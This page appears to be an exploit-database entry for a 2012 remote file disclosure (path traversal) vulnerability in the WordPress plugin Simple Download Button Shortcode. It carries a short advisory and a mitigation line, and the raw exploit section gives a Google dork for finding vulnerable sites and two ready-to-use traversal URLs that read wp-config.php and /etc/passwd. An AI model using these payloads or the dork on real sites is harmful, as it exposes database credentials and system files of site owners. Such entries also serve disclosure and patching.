header-logo
Suggest Exploit
vendor:
Simple Download Button Shortcode
by:
Sammy FORGIT
7,5
CVSS
HIGH
Remote File Disclosure
22
CWE
Product Name: Simple Download Button Shortcode
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: YES
Related CWE: N/A
CPE: a:wordpress:simple_download_button_shortcode
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2012

WordPress Plugins – Simple Download Button Shortcode Remote File Disclosure Vulnerability

This vulnerability allows an attacker to access sensitive files on the server by exploiting a flaw in the Simple Download Button Shortcode plugin for Wordpress. By sending a specially crafted request to the simple-download-button_dl.php script, an attacker can access files outside of the web root directory, such as the wp-config.php and /etc/passwd files.

Mitigation:

Upgrade to the latest version of the plugin, or disable the plugin if it is not necessary.
Source

Exploit-DB raw data:

##################################################
# Description : Wordpress Plugins - Simple Download Button Shortcode 
Remote File Disclosure Vulnerability
# Version : 1.0
# Link : 
http://wordpress.org/extend/plugins/simple-download-button-shortcode/
# Plugins : 
http://downloads.wordpress.org/plugin/simple-download-button-shortcode.1.0.0.zip
# Date : 30-05-2012
# Google Dork : inurl:/wp-content/plugins/simple-download-button-shortcode/
# Author : Sammy FORGIT - sam at opensyscom dot fr - 
http://www.opensyscom.fr
##################################################


Exploit :

http://www.exemple.com/wordpress/wp-content/plugins/simple-download-button-shortcode/simple-download-button_dl.php?file=../../../../wp-config.php

http://www.exemple.com/wordpress/wp-content/plugins/simple-download-button-shortcode/simple-download-button_dl.php?file=../../../../../../../../etc/passwd